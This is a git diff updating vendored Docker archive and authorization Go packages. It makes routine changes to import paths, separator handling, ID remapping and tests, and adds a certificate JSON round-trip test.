--- a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"os"
@@ -9,16 +9,16 @@ import (
 func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
 
 	// Don't look at size for dirs, its not a good measure of change
-	if oldStat.ModTime() != newStat.ModTime() ||
+	if oldStat.Mtim() != newStat.Mtim() ||
 		oldStat.Mode() != newStat.Mode() ||
-		oldStat.Size() != newStat.Size() && !oldStat.IsDir() {
+		oldStat.Size() != newStat.Size() && !oldStat.Mode().IsDir() {
 		return true
 	}
 	return false
 }
 
 func (info *FileInfo) isDir() bool {
-	return info.parent == nil || info.stat.IsDir()
+	return info.parent == nil || info.stat.Mode().IsDir()
 }
 
 func getIno(fi os.FileInfo) (inode uint64) {
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy.go b/vendor/github.com/docker/docker/pkg/archive/copy.go
index 0614c67cec..d0f13ca79b 100644
--- a/vendor/github.com/docker/docker/pkg/archive/copy.go
+++ b/vendor/github.com/docker/docker/pkg/archive/copy.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -9,8 +9,8 @@ import (
 	"path/filepath"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
 // Errors used or returned by this file.
@@ -27,23 +27,23 @@ var (
 // path (from before being processed by utility functions from the path or
 // filepath stdlib packages) ends with a trailing `/.` or `/`. If the cleaned
 // path already ends in a `.` path segment, then another is not added. If the
-// clean path already ends in a path separator, then another is not added.
-func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string {
+// clean path already ends in the separator, then another is not added.
+func PreserveTrailingDotOrSeparator(cleanedPath string, originalPath string, sep byte) string {
 	// Ensure paths are in platform semantics
-	cleanedPath = normalizePath(cleanedPath)
-	originalPath = normalizePath(originalPath)
+	cleanedPath = strings.Replace(cleanedPath, "/", string(sep), -1)
+	originalPath = strings.Replace(originalPath, "/", string(sep), -1)
 
 	if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) {
-		if !hasTrailingPathSeparator(cleanedPath) {
+		if !hasTrailingPathSeparator(cleanedPath, sep) {
 			// Add a separator if it doesn't already end with one (a cleaned
 			// path would only end in a separator if it is the root).
-			cleanedPath += string(filepath.Separator)
+			cleanedPath += string(sep)
 		}
 		cleanedPath += "."
 	}
 
-	if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) {
-		cleanedPath += string(filepath.Separator)
+	if !hasTrailingPathSeparator(cleanedPath, sep) && hasTrailingPathSeparator(originalPath, sep) {
+		cleanedPath += string(sep)
 	}
 
 	return cleanedPath
@@ -52,14 +52,14 @@ func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string {
 // assertsDirectory returns whether the given path is
 // asserted to be a directory, i.e., the path ends with
 // a trailing '/' or `/.`, assuming a path separator of `/`.
-func assertsDirectory(path string) bool {
-	return hasTrailingPathSeparator(path) || specifiesCurrentDir(path)
+func assertsDirectory(path string, sep byte) bool {
+	return hasTrailingPathSeparator(path, sep) || specifiesCurrentDir(path)
 }
 
 // hasTrailingPathSeparator returns whether the given
 // path ends with the system's path separator character.
-func hasTrailingPathSeparator(path string) bool {
-	return len(path) > 0 && os.IsPathSeparator(path[len(path)-1])
+func hasTrailingPathSeparator(path string, sep byte) bool {
+	return len(path) > 0 && path[len(path)-1] == sep
 }
 
 // specifiesCurrentDir returns whether the given path specifies
@@ -72,10 +72,10 @@ func specifiesCurrentDir(path string) bool {
 // basename by first cleaning the path but preserves a trailing "." if the
 // original path specified the current directory.
 func SplitPathDirEntry(path string) (dir, base string) {
-	cleanedPath := filepath.Clean(normalizePath(path))
+	cleanedPath := filepath.Clean(filepath.FromSlash(path))
 
 	if specifiesCurrentDir(path) {
-		cleanedPath += string(filepath.Separator) + "."
+		cleanedPath += string(os.PathSeparator) + "."
 	}
 
 	return filepath.Dir(cleanedPath), filepath.Base(cleanedPath)
@@ -106,19 +106,24 @@ func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, er
 	// Separate the source path between its directory and
 	// the entry in that directory which we are archiving.
 	sourceDir, sourceBase := SplitPathDirEntry(sourcePath)
-
-	filter := []string{sourceBase}
+	opts := TarResourceRebaseOpts(sourceBase, rebaseName)
 
 	logrus.Debugf("copying %q from %q", sourceBase, sourceDir)
+	return TarWithOptions(sourceDir, opts)
+}
 
-	return TarWithOptions(sourceDir, &TarOptions{
+// TarResourceRebaseOpts does not preform the Tar, but instead just creates the rebase
+// parameters to be sent to TarWithOptions (the TarOptions struct)
+func TarResourceRebaseOpts(sourceBase string, rebaseName string) *TarOptions {
+	filter := []string{sourceBase}
+	return &TarOptions{
 		Compression:      Uncompressed,
 		IncludeFiles:     filter,
 		IncludeSourceDir: true,
 		RebaseNames: map[string]string{
 			sourceBase: rebaseName,
 		},
-	})
+	}
 }
 
 // CopyInfo holds basic info about the source
@@ -218,7 +223,7 @@ func CopyInfoDestinationPath(path string) (info CopyInfo, err error) {
 		// Ensure destination parent dir exists.
 		dstParent, _ := SplitPathDirEntry(path)
 
-		parentDirStat, err := os.Lstat(dstParent)
+		parentDirStat, err := os.Stat(dstParent)
 		if err != nil {
 			return CopyInfo{}, err
 		}
@@ -281,7 +286,7 @@ func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir
 			srcBase = srcInfo.RebaseName
 		}
 		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
-	case assertsDirectory(dstInfo.Path):
+	case assertsDirectory(dstInfo.Path, os.PathSeparator):
 		// The destination does not exist and is asserted to be created as a
 		// directory, but the source content is not a directory. This is an
 		// error condition since you cannot create a directory from a file
@@ -332,6 +337,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read
 			}
 
 			hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1)
+			if hdr.Typeflag == tar.TypeLink {
+				hdr.Linkname = strings.Replace(hdr.Linkname, oldBase, newBase, 1)
+			}
 
 			if err = rebasedTar.WriteHeader(hdr); err != nil {
 				w.CloseWithError(err)
@@ -348,6 +356,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read
 	return rebased
 }
 
+// TODO @gupta-ak. These might have to be changed in the future to be
+// continuity driver aware as well to support LCOW.
+
 // CopyResource performs an archive copy from the given source path to the
 // given destination path. The source path MUST exist and the destination
 // path's parent directory must exist.
@@ -362,8 +373,8 @@ func CopyResource(srcPath, dstPath string, followLink bool) error {
 	dstPath = normalizePath(dstPath)
 
 	// Clean the source and destination paths.
-	srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath)
-	dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath)
+	srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath, os.PathSeparator)
+	dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath, os.PathSeparator)
 
 	if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil {
 		return err
@@ -426,7 +437,8 @@ func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseNa
 		// resolvedDirPath will have been cleaned (no trailing path separators) so
 		// we can manually join it with the base path element.
 		resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath
-		if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) {
+		if hasTrailingPathSeparator(path, os.PathSeparator) &&
+			filepath.Base(path) != filepath.Base(resolvedPath) {
 			rebaseName = filepath.Base(path)
 		}
 	}
@@ -439,11 +451,13 @@ func GetRebaseName(path, resolvedPath string) (string, string) {
 	// linkTarget will have been cleaned (no trailing path separators and dot) so
 	// we can manually join it with them
 	var rebaseName string
-	if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) {
+	if specifiesCurrentDir(path) &&
+		!specifiesCurrentDir(resolvedPath) {
 		resolvedPath += string(filepath.Separator) + "."
 	}
 
-	if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) {
+	if hasTrailingPathSeparator(path, os.PathSeparator) &&
+		!hasTrailingPathSeparator(resolvedPath, os.PathSeparator) {
 		resolvedPath += string(filepath.Separator)
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go
index e305b5e4af..3958364f5b 100644
--- a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"path/filepath"
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
index ecbfc172b0..739ad0e3ef 100644
--- a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
@@ -1,8 +1,8 @@
 // +build !windows
 
-// TODO Windows: Some of these tests may be salvagable and portable to Windows.
+// TODO Windows: Some of these tests may be salvageable and portable to Windows.
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"bytes"
@@ -15,6 +15,8 @@ import (
 	"path/filepath"
 	"strings"
 	"testing"
+
+	"gotest.tools/assert"
 )
 
 func removeAllPaths(paths ...string) {
@@ -26,13 +28,11 @@ func removeAllPaths(paths ...string) {
 func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) {
 	var err error
 
-	if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
-		t.Fatal(err)
-	}
+	tmpDirA, err = ioutil.TempDir("", "archive-copy-test")
+	assert.NilError(t, err)
 
-	if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
-		t.Fatal(err)
-	}
+	tmpDirB, err = ioutil.TempDir("", "archive-copy-test")
+	assert.NilError(t, err)
 
 	return
 }
@@ -118,9 +118,8 @@ func logDirContents(t *testing.T, dirPath string) {
 
 	t.Logf("logging directory contents: %q", dirPath)
 
-	if err := filepath.Walk(dirPath, logWalkedPaths); err != nil {
-		t.Fatal(err)
-	}
+	err := filepath.Walk(dirPath, logWalkedPaths)
+	assert.NilError(t, err)
 }
 
 func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) {
@@ -293,9 +292,8 @@ func TestCopyCaseA(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, srcPath, dstPath)
+	assert.NilError(t, err)
 	os.Remove(dstPath)
 
 	symlinkPath := filepath.Join(tmpDirA, "symlink3")
@@ -306,17 +304,15 @@ func TestCopyCaseA(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, linkTarget, dstPath)
+	assert.NilError(t, err)
 	os.Remove(dstPath)
 	if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, linkTarget, dstPath)
+	assert.NilError(t, err)
 }
 
 // B. SRC specifies a file and DST (with trailing path separator) doesn't
@@ -377,9 +373,8 @@ func TestCopyCaseC(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, srcPath, dstPath)
+	assert.NilError(t, err)
 }
 
 // C. Symbol link following version:
@@ -415,9 +410,8 @@ func TestCopyCaseCFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, linkTarget, dstPath)
+	assert.NilError(t, err)
 }
 
 // D. SRC specifies a file and DST exists as a directory. This should place
@@ -446,9 +440,8 @@ func TestCopyCaseD(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, srcPath, dstPath)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -466,9 +459,8 @@ func TestCopyCaseD(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, srcPath, dstPath)
+	assert.NilError(t, err)
 }
 
 // D. Symbol link following version:
@@ -499,9 +491,8 @@ func TestCopyCaseDFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, linkTarget, dstPath)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -519,9 +510,8 @@ func TestCopyCaseDFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
-		t.Fatal(err)
-	}
+	err = fileContentsEqual(t, linkTarget, dstPath)
+	assert.NilError(t, err)
 }
 
 // E. SRC specifies a directory and DST does not exist. This should create a
@@ -563,9 +553,8 @@ func TestCopyCaseE(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, srcDir)
+	assert.NilError(t, err)
 }
 
 // E. Symbol link following version:
@@ -609,9 +598,8 @@ func TestCopyCaseEFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, linkTarget)
+	assert.NilError(t, err)
 }
 
 // F. SRC specifies a directory and DST exists as a file. This should cause an
@@ -669,9 +657,8 @@ func TestCopyCaseG(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, resultDir, srcDir); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, resultDir, srcDir)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -689,9 +676,8 @@ func TestCopyCaseG(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, resultDir, srcDir); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, resultDir, srcDir)
+	assert.NilError(t, err)
 }
 
 // G. Symbol link version:
@@ -717,9 +703,8 @@ func TestCopyCaseGFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, resultDir, linkTarget); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, resultDir, linkTarget)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -737,9 +722,8 @@ func TestCopyCaseGFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, resultDir, linkTarget); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, resultDir, linkTarget)
+	assert.NilError(t, err)
 }
 
 // H. SRC specifies a directory's contents only and DST does not exist. This
@@ -899,9 +883,8 @@ func TestCopyCaseJ(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, srcDir)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -919,9 +902,8 @@ func TestCopyCaseJ(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, srcDir)
+	assert.NilError(t, err)
 }
 
 // J. Symbol link following version:
@@ -952,9 +934,8 @@ func TestCopyCaseJFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, linkTarget)
+	assert.NilError(t, err)
 
 	// Now try again but using a trailing path separator for dstDir.
 
@@ -972,7 +953,6 @@ func TestCopyCaseJFSym(t *testing.T) {
 		t.Fatalf("unexpected error %T: %s", err, err)
 	}
 
-	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
-		t.Fatal(err)
-	}
+	err = dirContentsEqual(t, dstDir, linkTarget)
+	assert.NilError(t, err)
 }
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go
index 2b775b45c4..a878d1bac4 100644
--- a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"path/filepath"
diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go
index 9e1a58c499..fae4b9de02 100644
--- a/vendor/github.com/docker/docker/pkg/archive/diff.go
+++ b/vendor/github.com/docker/docker/pkg/archive/diff.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -10,10 +10,10 @@ import (
 	"runtime"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/pools"
 	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
 // UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be
@@ -33,17 +33,11 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64,
 	if options.ExcludePatterns == nil {
 		options.ExcludePatterns = []string{}
 	}
-	remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
-	if err != nil {
-		return 0, err
-	}
+	idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps)
 
 	aufsTempdir := ""
 	aufsHardlinks := make(map[string]*tar.Header)
 
-	if options == nil {
-		options = &TarOptions{}
-	}
 	// Iterate through the files in the archive.
 	for {
 		hdr, err := tr.Next()
@@ -90,7 +84,7 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64,
 			parentPath := filepath.Join(dest, parent)
 
 			if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) {
-				err = system.MkdirAll(parentPath, 0600)
+				err = system.MkdirAll(parentPath, 0600, "")
 				if err != nil {
 					return 0, err
 				}
@@ -198,27 +192,10 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64,
 				srcData = tmpFile
 			}
 
-			// if the options contain a uid & gid maps, convert header uid/gid
-			// entries using the maps such that lchown sets the proper mapped
-			// uid/gid after writing the file. We only perform this mapping if
-			// the file isn't already owned by the remapped root UID or GID, as
-			// that specific uid/gid has no mapping from container -> host, and
-			// those files already have the proper ownership for inside the
-			// container.
-			if srcHdr.Uid != remappedRootUID {
-				xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps)
-				if err != nil {
-					return 0, err
-				}
-				srcHdr.Uid = xUID
-			}
-			if srcHdr.Gid != remappedRootGID {
-				xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps)
-				if err != nil {
-					return 0, err
-				}
-				srcHdr.Gid = xGID
+			if err := remapIDs(idMappings, srcHdr); err != nil {
+				return 0, err
 			}
+
 			if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil {
 				return 0, err
 			}
@@ -270,10 +247,12 @@ func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decomp
 	defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform
 
 	if decompress {
-		layer, err = DecompressStream(layer)
+		decompLayer, err := DecompressStream(layer)
 		if err != nil {
 			return 0, err
 		}
+		defer decompLayer.Close()
+		layer = decompLayer
 	}
 	return UnpackLayer(dest, layer, options)
 }
diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go
index 8167941ac0..19f2555e1a 100644
--- a/vendor/github.com/docker/docker/pkg/archive/diff_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go
index cedd46a408..495db809e9 100644
--- a/vendor/github.com/docker/docker/pkg/archive/example_changes.go
+++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go
@@ -13,8 +13,8 @@ import (
 	"os"
 	"path"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/sirupsen/logrus"
 )
 
 var (
diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go
index 3448569b1e..797143ee84 100644
--- a/vendor/github.com/docker/docker/pkg/archive/time_linux.go
+++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"syscall"
@@ -9,7 +9,7 @@ func timeToTimespec(time time.Time) (ts syscall.Timespec) {
 	if time.IsZero() {
 		// Return UTIME_OMIT special value
 		ts.Sec = 0
-		ts.Nsec = ((1 << 30) - 2)
+		ts.Nsec = (1 << 30) - 2
 		return
 	}
 	return syscall.NsecToTimespec(time.UnixNano())
diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
index e85aac0540..f58bf227fd 100644
--- a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go
index 01b9e92d1c..a20f58ddab 100644
--- a/vendor/github.com/docker/docker/pkg/archive/utils_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go
index d20478a10d..4c072a87ee 100644
--- a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go
+++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 // Whiteouts are files with a special meaning for the layered filesystem.
 // Docker uses AUFS whiteout files inside exported archives. In other
diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go
index b39d12c878..85435694cf 100644
--- a/vendor/github.com/docker/docker/pkg/archive/wrap.go
+++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go
index 46ab36697a..1faa7aed75 100644
--- a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go
@@ -1,17 +1,17 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
 	"bytes"
 	"io"
 	"testing"
+
+	"gotest.tools/assert"
 )
 
 func TestGenerateEmptyFile(t *testing.T) {
 	archive, err := Generate("emptyFile")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	if archive == nil {
 		t.Fatal("The generated archive should not be nil.")
 	}
@@ -28,9 +28,7 @@ func TestGenerateEmptyFile(t *testing.T) {
 		if err == io.EOF {
 			break
 		}
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, err)
 		buf := new(bytes.Buffer)
 		buf.ReadFrom(tr)
 		content := buf.String()
@@ -54,9 +52,7 @@ func TestGenerateEmptyFile(t *testing.T) {
 
 func TestGenerateWithContent(t *testing.T) {
 	archive, err := Generate("file", "content")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	if archive == nil {
 		t.Fatal("The generated archive should not be nil.")
 	}
@@ -73,9 +69,7 @@ func TestGenerateWithContent(t *testing.T) {
 		if err == io.EOF {
 			break
 		}
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, err)
 		buf := new(bytes.Buffer)
 		buf.ReadFrom(tr)
 		content := buf.String()
diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go
index 05c75f1a67..cc0c12d502 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/api.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/api.go
@@ -1,4 +1,4 @@
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
 	"crypto/x509"
@@ -18,7 +18,7 @@ const (
 )
 
 // PeerCertificate is a wrapper around x509.Certificate which provides a sane
-// enconding/decoding to/from PEM format and JSON.
+// encoding/decoding to/from PEM format and JSON.
 type PeerCertificate x509.Certificate
 
 // MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate.
diff --git a/vendor/github.com/docker/docker/pkg/authorization/api_test.go b/vendor/github.com/docker/docker/pkg/authorization/api_test.go
new file mode 100644
index 0000000000..ff364fd0bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/api_test.go
@@ -0,0 +1,76 @@
+package authorization // import "github.com/docker/docker/pkg/authorization"
+
+import (
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/tls"
+	"crypto/x509"
+	"crypto/x509/pkix"
+	"math/big"
+	"net/http"
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestPeerCertificateMarshalJSON(t *testing.T) {
+	template := &x509.Certificate{
+		IsCA: true,
+		BasicConstraintsValid: true,
+		SubjectKeyId:          []byte{1, 2, 3},
+		SerialNumber:          big.NewInt(1234),
+		Subject: pkix.Name{
+			Country:      []string{"Earth"},
+			Organization: []string{"Mother Nature"},
+		},
+		NotBefore: time.Now(),
+		NotAfter:  time.Now().AddDate(5, 5, 5),
+
+		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth},
+		KeyUsage:    x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
+	}
+	// generate private key
+	privatekey, err := rsa.GenerateKey(rand.Reader, 2048)
+	assert.NilError(t, err)
+	publickey := &privatekey.PublicKey
+
+	// create a self-signed certificate. template = parent
+	var parent = template
+	raw, err := x509.CreateCertificate(rand.Reader, template, parent, publickey, privatekey)
+	assert.NilError(t, err)
+
+	cert, err := x509.ParseCertificate(raw)
+	assert.NilError(t, err)
+
+	var certs = []*x509.Certificate{cert}
+	addr := "www.authz.com/auth"
+	req, err := http.NewRequest("GET", addr, nil)
+	assert.NilError(t, err)
+
+	req.RequestURI = addr
+	req.TLS = &tls.ConnectionState{}
+	req.TLS.PeerCertificates = certs
+	req.Header.Add("header", "value")
+
+	for _, c := range req.TLS.PeerCertificates {
+		pcObj := PeerCertificate(*c)
+
+		t.Run("Marshalling :", func(t *testing.T) {
+			raw, err = pcObj.MarshalJSON()
+			assert.Assert(t, raw != nil)
+			assert.NilError(t, err)
+		})
+
+		t.Run("UnMarshalling :", func(t *testing.T) {
+			err := pcObj.UnmarshalJSON(raw)
+			assert.Assert(t, is.Nil(err))
+			assert.Equal(t, "Earth", pcObj.Subject.Country[0])
+			assert.Equal(t, true, pcObj.IsCA)
+
+		})
+
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go
index dc9a9ae56f..a1edbcd89d 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/authz.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go
@@ -1,15 +1,16 @@
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
 	"bufio"
 	"bytes"
